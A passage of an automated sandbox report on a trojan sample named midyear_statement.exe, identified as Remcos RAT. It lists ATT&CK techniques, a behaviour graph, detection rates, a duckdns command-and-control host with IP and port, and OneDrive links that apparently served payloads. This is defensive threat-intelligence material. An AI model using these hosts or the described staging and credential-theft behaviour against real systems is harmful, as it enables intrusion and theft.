                      Source: Yara matchFile source: 00000021.00000002.1658571409.00000000244BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: wkrriuhD.pif PID: 7860, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: wkrriuhD.pif PID: 1652, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: cmd.exe24_2_1233569A

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information1
                      Scripting                      		1
                      Valid Accounts                      		11
                      Native API                      		1
                      Scripting                      		1
                      DLL Side-Loading                      		1
                      Disable or Modify Tools                      		2
                      OS Credential Dumping                      		2
                      System Time Discovery                      		Remote Services11
                      Archive Collected Data                      		12
                      Ingress Tool Transfer                      		Exfiltration Over Other Network Medium1
                      System Shutdown/Reboot
                      CredentialsDomainsDefault Accounts13
                      Command and Scripting Interpreter                      		1
                      DLL Side-Loading                      		1
                      Bypass User Account Control                      		1
                      Deobfuscate/Decode Files or Information                      		211
                      Input Capture                      		1
                      Account Discovery                      		Remote Desktop Protocol1
                      Data from Local System                      		21
                      Encrypted Channel                      		Exfiltration Over Bluetooth1
                      Defacement
                      Email AddressesDNS ServerDomain Accounts2
                      Service Execution                      		1
                      Valid Accounts                      		1
                      Valid Accounts                      		2
                      Obfuscated Files or Information                      		2
                      Credentials in Registry                      		1
                      System Service Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		1
                      Remote Access Software                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCron1
                      Windows Service                      		11
                      Access Token Manipulation                      		2
                      Software Packing                      		3
                      Credentials In Files                      		1
                      System Network Connections Discovery                      		Distributed Component Object Model211
                      Input Capture                      		2
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchd1
                      Registry Run Keys / Startup Folder                      		1
                      Windows Service                      		1
                      Timestomp                      		LSA Secrets3
                      File and Directory Discovery                      		SSH3
                      Clipboard Data                      		213
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts422
                      Process Injection                      		1
                      DLL Side-Loading                      		Cached Domain Credentials59
                      System Information Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                      Registry Run Keys / Startup Folder                      		1
                      Bypass User Account Control                      		DCSync161
                      Security Software Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      File Deletion                      		Proc Filesystem41
                      Virtualization/Sandbox Evasion                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt221
                      Masquerading                      		/etc/passwd and /etc/shadow4
                      Process Discovery                      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                      Valid Accounts                      		Network Sniffing1
                      Application Window Discovery                      		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd41
                      Virtualization/Sandbox Evasion                      		Input Capture1
                      System Owner/User Discovery                      		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                      Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task11
                      Access Token Manipulation                      		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                      Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers422
                      Process Injection                      		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1417015 Sample: midyear_statement.exe Startdate: 28/03/2024 Architecture: WINDOWS Score: 100 77 www.zuckdgreb.duckdns.org 2->77 79 web.fe.1drv.com 2->79 81 8 other IPs or domains 2->81 89 Snort IDS alert for network traffic 2->89 91 Found malware configuration 2->91 93 Malicious sample detected (through community Yara rule) 2->93 97 15 other signatures 2->97 12 midyear_statement.exe 1 6 2->12         started        17 Dhuirrkw.PIF 2->17         started        19 Dhuirrkw.PIF 2->19         started        signatures3 95 Uses dynamic DNS services 77->95 process4 dnsIp5 87 dual-spov-0006.spov-msedge.net 13.107.139.11, 443, 49699, 49700 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 12->87 69 C:\Windows \System32\netutils.dll, PE32+ 12->69 dropped 71 C:\Windows \System32\2506803.exe, PE32+ 12->71 dropped 73 C:\Users\Public\Libraries\wkrriuhD.pif, PE32 12->73 dropped 75 C:\Users\Public\Dhuirrkw.url, MS 12->75 dropped 121 Drops PE files with a suspicious file extension 12->121 123 Writes to foreign memory regions 12->123 125 Allocates memory in foreign processes 12->125 21 wkrriuhD.pif 3 16 12->21         started        26 cmd.exe 1 12->26         started        28 extrac32.exe 1 12->28         started        34 3 other processes 12->34 127 Multi AV Scanner detection for dropped file 17->127 30 wkrriuhD.pif 17->30         started        32 wkrriuhD.pif 19->32         started        file6 signatures7 process8 dnsIp9 83 www.zuckdgreb.duckdns.org 192.3.109.132, 4445, 49708, 49711 AS-COLOCROSSINGUS United States 21->83 85 geoplugin.net 178.237.33.50, 49712, 80 ATOM86-ASATOM86NL Netherlands 21->85 65 C:\ProgramData\remcos\logs.dat, data 21->65 dropped 109 Contains functionality to bypass UAC (CMSTPLUA) 21->109 111 Detected unpacking (changes PE section rights) 21->111 113 Detected Remcos RAT 21->113 119 10 other signatures 21->119 36 wkrriuhD.pif 21->36         started        39 wkrriuhD.pif 21->39         started        41 wkrriuhD.pif 2 21->41         started        115 Drops executables to the windows directory (C:\Windows) and starts them 26->115 43 2506803.exe 26->43         started        45 conhost.exe 26->45         started        67 C:\Users\Public\Libraries\Dhuirrkw.PIF, PE32 28->67 dropped 117 Drops PE files with a suspicious file extension 28->117 47 conhost.exe 34->47         started        49 conhost.exe 34->49         started        file10 signatures11 process12 signatures13 101 Tries to steal Instant Messenger accounts or passwords 36->101 103 Tries to steal Mail credentials (via file / registry access) 36->103 105 Tries to harvest and steal browser information (history, passwords, etc) 39->105 51 cmd.exe 1 43->51         started        process14 signatures15 99 Adds a directory exclusion to Windows Defender 51->99 54 cmd.exe 1 51->54         started        57 conhost.exe 51->57         started        process16 signatures17 107 Adds a directory exclusion to Windows Defender 54->107 59 powershell.exe 23 54->59         started        61 conhost.exe 54->61         started        process18 process19 63 WmiPrvSE.exe 59->63         started       

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      midyear_statement.exe26%ReversingLabsWin32.Trojan.Generic
                      midyear_statement.exe31%VirustotalBrowse

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\Public\Libraries\Dhuirrkw.PIF26%ReversingLabsWin32.Trojan.Generic
                      C:\Users\Public\Libraries\wkrriuhD.pif3%ReversingLabs
                      C:\Windows \System32\2506803.exe0%ReversingLabs
                      C:\Windows \System32\netutils.dll75%ReversingLabsWin64.Trojan.Barys

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://www.imvu.comr0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      https://aefd.nelreports.net/api/report?cat=bingth0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#0%URL Reputationsafe
                      https://aefd.nelreports.net/api/report?cat=bingaotak0%URL Reputationsafe
                      https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
                      http://geoplugin.net/json.gp/C100%URL Reputationphishing
                      https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl00%URL Reputationsafe
                      https://sectigo.com/CPS00%URL Reputationsafe
                      https://aefd.nelreports.net/api/report?cat=wsb0%URL Reputationsafe
                      http://geoplugin.net/json.gp100%URL Reputationphishing
                      https://aefd.nelreports.net/api/report?cat=bingaot0%URL Reputationsafe
                      https://aefd.nelreports.net/api/report?cat=bingrms0%URL Reputationsafe
                      http://ocsp.sectigo.com0C0%URL Reputationsafe
                      http://www.ebuddy.com0%URL Reputationsafe
                      https://fp-afd.azurefd.us/apc/trans.gif?a2555e10569a45fe03b885d268c50da90%Avira URL Cloudsafe
                      https://fp-afd.azurefd.us/apc/trans.gif?69c749c200c753dfb00f5bc8299ab8eb0%Avira URL Cloudsafe
                      http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
                      https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?c2fcd52267835a3e34f9ac050%Avira URL Cloudsafe
                      http://geoplugin.net/json.gpl0%Avira URL Cloudsafe
                      http://geoplugin.net/json.gpSystem320%Avira URL Cloudsafe
                      xwww.zuckdgreb.duckdns.org0%Avira URL Cloudsafe
                      https://onedrive.live.co0%Avira URL Cloudsafe
                      https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?bd78002c55888096ce060c580%Avira URL Cloudsafe
                      http://www.imvu.comppData0%Avira URL Cloudsafe
                      http://geoplugin.net/0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      dual-spov-0006.spov-msedge.net
                      		13.107.139.11
                      		truefalse
                        		unknown
                        www.zuckdgreb.duckdns.org
                        		192.3.109.132
                        		truetrue
                          		unknown
                          geoplugin.net
                          		178.237.33.50
                          		truefalse
                            		unknown
                            onedrive.live.com
                            		unknown
                            		unknownfalse
                              		high
                              abpoxw.sn.files.1drv.com
                              		unknown
                              		unknownfalse
                                		high
                                aborlw.sn.files.1drv.com
                                		unknown
                                		unknownfalse
                                  		high
                                  abqscw.sn.files.1drv.com
                                  		unknown
                                  		unknownfalse
                                    		high

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    https://onedrive.live.com/download?resid=653A5056738F1A02%21264&authkey=!AJnxVlB06nkVKskfalse
                                      		high
                                      https://onedrive.live.com/download?resid=653A5056738F1A02%21262&authkey=!ANnz1a3_33sd8v4false
                                        		high
                                        xwww.zuckdgreb.duckdns.orgtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://geoplugin.net/json.gptrue
                                        • URL Reputation: phishing
                                        		unknown
                                        https://onedrive.live.com/download?resid=653A5056738F1A02%21263&authkey=!AN5i5LusLT79ejgfalse
                                          		high

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=Pbhv348F.tmp.27.drfalse
                                            		high
                                            https://fp-afd.azurefd.us/apc/trans.gif?a2555e10569a45fe03b885d268c50da9bhv348F.tmp.27.drfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.imvu.comrwkrriuhD.pif, 00000018.00000002.3665873791.0000000015C60000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://ocsp.sectigo.com0midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://abpoxw.sn.files.1drv.com:443/y4maSSmIiFxHS53VrMh0Wc-KmE9UNGqFMoeO06mE8M1WEFsDmr1AeIzN4LcJU6cDhuirrkw.PIF, 00000020.00000003.1637043609.000000000082F000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://abqscw.sn.files.1drv.com/y4mM5VAFczkoUgXiRkT2NbXnlBwvzcPuKz5AwJErjUwbkEuoWmzy8jSXGy266gPIcJHDhuirrkw.PIF, 0000001E.00000003.1514589660.0000000000803000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1598043310.0000000000838000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://aefd.nelreports.net/api/report?cat=bingthbhv348F.tmp.27.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://aborlw.sn.files.1drv.com/y4mdIO5pciNH8fpwGOAAIADTo3pXjwRKPU-X6-J-zpDME1cfDB5-C-zJvJ0Zyx9NPNNmidyear_statement.exe, 00000000.00000003.1240930752.00000000008B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.nirsoft.netwkrriuhD.pif, 0000001B.00000002.1406015576.0000000000193000.00000004.00000010.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://aefd.nelreports.net/api/report?cat=bingaotakbhv348F.tmp.27.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://deff.nelreports.net/api/report?cat=msnbhv348F.tmp.27.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?c2fcd52267835a3e34f9ac05bhv348F.tmp.27.drfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://abpoxw.sn.files.1drv.com/y4mVdi6rp2qkaaDX5Txipl4hmgaKma0en0K10OdbofbDqqNgddkNvfFr34Mxc3bQcF3Dhuirrkw.PIF, 00000020.00000003.1637043609.00000000007E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comwkrriuhD.pif, 00000018.00000002.3665873791.0000000015C60000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://abqscw.sn.files.1drv.com/Dhuirrkw.PIF, 0000001E.00000003.1514589660.00000000007D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://onedrive.live.com/Dhuirrkw.PIF, 00000020.00000002.1638568341.00000000007B1000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1637043609.000000000078E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://onedrive.live.com/download?resid=653A5056738F1A02%21262&authkey=Dhuirrkw.PIF, 00000020.00000002.1639873625.0000000003C12000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.google.comwkrriuhD.pif, 00000018.00000002.3665873791.0000000015C60000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                              		high
                                                              https://abpoxw.sn.files.1drv.com/y4mhwTfeKQ4eY5KLg3nmxa_boO0q7i2wmVFOUDCXUh0ad78865G9-BX4CJ3kGlJVsreDhuirrkw.PIF, 0000001E.00000002.1567523437.00000000007E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://fp-afd.azurefd.us/apc/trans.gif?69c749c200c753dfb00f5bc8299ab8ebbhv348F.tmp.27.drfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://geoplugin.net/json.gp/CwkrriuhD.pif, 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, wkrriuhD.pif, 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, wkrriuhD.pif, 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, wkrriuhD.pif, 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, wkrriuhD.pif, 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmptrue
                                                                • URL Reputation: phishing
                                                                		unknown
                                                                https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platbhv348F.tmp.27.drfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://live.com/midyear_statement.exe, 00000000.00000002.1362063312.000000000088A000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1637043609.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1616842718.00000000007E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://login.yahoo.com/config/loginwkrriuhD.piffalse
                                                                    		high
                                                                    https://abpoxw.sn.files.1drv.com:443/y4ms4H1tLcGEiSUU0ZXyS-1UhN1A1nY0HWv2H1VcTggiyFj5GyqXlnGNUvRGU1ymidyear_statement.exe, 00000000.00000003.1292113599.0000000000907000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.nirsoft.net/wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        https://onedrive.live.com/download?resid=653A5056738F1A02%21263&authkey=Dhuirrkw.PIF, 00000020.00000003.1616842718.00000000007E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://aborlw.sn.files.1drv.com/y4mhPCChdz-WmirIkiDV2ww7X8Bbd2o2c6Warvjl_dk_jMmN6VWuryzdoRm3kPHX80_Dhuirrkw.PIF, 00000020.00000003.1616842718.00000000007E3000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1616710283.000000000083A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://onedrive.live.coDhuirrkw.PIF, 00000020.00000002.1638568341.0000000000808000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://aborlw.sn.files.1drv.com/midyear_statement.exe, 00000000.00000003.1240930752.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 0000001E.00000003.1545163878.00000000007FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&bhv348F.tmp.27.drfalse
                                                                                		high
                                                                                http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://abqscw.sn.files.1drv.com/y4mu3pWdZcj6Ve9WuLc8z50Ki8byXob_qMUj9cAdyMI-JlRVlQqz67Is5cy4lCX-g6MDhuirrkw.PIF, 0000001E.00000003.1514589660.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.office.com/bhv348F.tmp.27.drfalse
                                                                                    		high
                                                                                    https://live.com/WDhuirrkw.PIF, 0000001E.00000003.1564727013.00000000007D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://sectigo.com/CPS0midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://live.com/XDhuirrkw.PIF, 0000001E.00000003.1514589660.00000000007D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://geoplugin.net/json.gplwkrriuhD.pif, 00000018.00000003.1379033633.00000000124BD000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1382491430.00000000124BD000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1405851694.00000000124BD000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1622995189.00000000124BD000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3664577079.00000000124BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://abpoxw.sn.files.1drv.com:443/y4mhwTfeKQ4eY5KLg3nmxa_boO0q7i2wmVFOUDCXUh0ad78865G9-BX4CJ3kGlJDhuirrkw.PIF, 0000001E.00000003.1564727013.0000000000818000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.imvu.comwkrriuhD.pif, 00000018.00000002.3665873791.0000000015C60000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000003.1386954582.000000000096D000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000003.1386589217.000000000096D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://abpoxw.sn.files.1drv.com/y4maSSmIiFxHS53VrMh0Wc-KmE9UNGqFMoeO06mE8M1WEFsDmr1AeIzN4LcJU6cd0KwDhuirrkw.PIF, 00000020.00000003.1637043609.00000000007E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://aefd.nelreports.net/api/report?cat=wsbbhv348F.tmp.27.drfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://aborlw.sn.files.1drv.com/oDhuirrkw.PIF, 00000020.00000003.1616842718.00000000007E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.imvu.comppDatawkrriuhD.pif, 0000001D.00000003.1386954582.000000000096D000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000003.1386589217.000000000096D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgbhv348F.tmp.27.drfalse
                                                                                                  		high
                                                                                                  https://abqscw.sn.files.1drv.com:443/y4mu3pWdZcj6Ve9WuLc8z50Ki8byXob_qMUj9cAdyMI-JlRVlQqz67Is5cy4lCXDhuirrkw.PIF, 0000001E.00000003.1514589660.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?bd78002c55888096ce060c58bhv348F.tmp.27.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://onedrive.live.com/download?resid=653A5056738F1A02%21264&authkey=Dhuirrkw.PIF, 00000020.00000002.1639873625.0000000003C12000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://geoplugin.net/json.gpSystem32wkrriuhD.pif, 00000018.00000003.1379033633.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1382491430.0000000012491000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://aborlw.sn.files.1drv.com/y4mLOg16uNX2Id3t-nfFLVYL7CZhAgTRemSr1q_NX-Mvx_fpOOS9Dz7js9NACEXeYp5Dhuirrkw.PIF, 0000001E.00000003.1545101196.0000000000824000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://geoplugin.net/wkrriuhD.pif, 00000018.00000003.1379033633.00000000124CA000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1379159545.00000000124D2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://aefd.nelreports.net/api/report?cat=bingaotbhv348F.tmp.27.drfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        https://aborlw.sn.files.1drv.com/y4mXBt2sSJKJZHlLzI8sH3PFmgRqsPoY_FaTasOJSi4WNTk8bd6AgZ1TzwzQWZ2uDijDhuirrkw.PIF, 00000020.00000003.1616842718.00000000007E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://aefd.nelreports.net/api/report?cat=bingrmsbhv348F.tmp.27.drfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://live.com/aDhuirrkw.PIF, 0000001E.00000003.1545163878.00000000007D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://www.google.com/accounts/serviceloginwkrriuhD.piffalse
                                                                                                              		high
                                                                                                              https://live.com/gmidyear_statement.exe, 00000000.00000003.1240930752.00000000008B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://abpoxw.sn.files.1drv.com/y4ms4H1tLcGEiSUU0ZXyS-1UhN1A1nY0HWv2H1VcTggiyFj5GyqXlnGNUvRGU1yWLZHmidyear_statement.exe, 00000000.00000002.1380482770.0000000015BD6000.00000004.00000020.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1292113599.00000000008FB000.00000004.00000020.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1362063312.000000000088A000.00000004.00000020.00020000.00000000.sdmpfalse
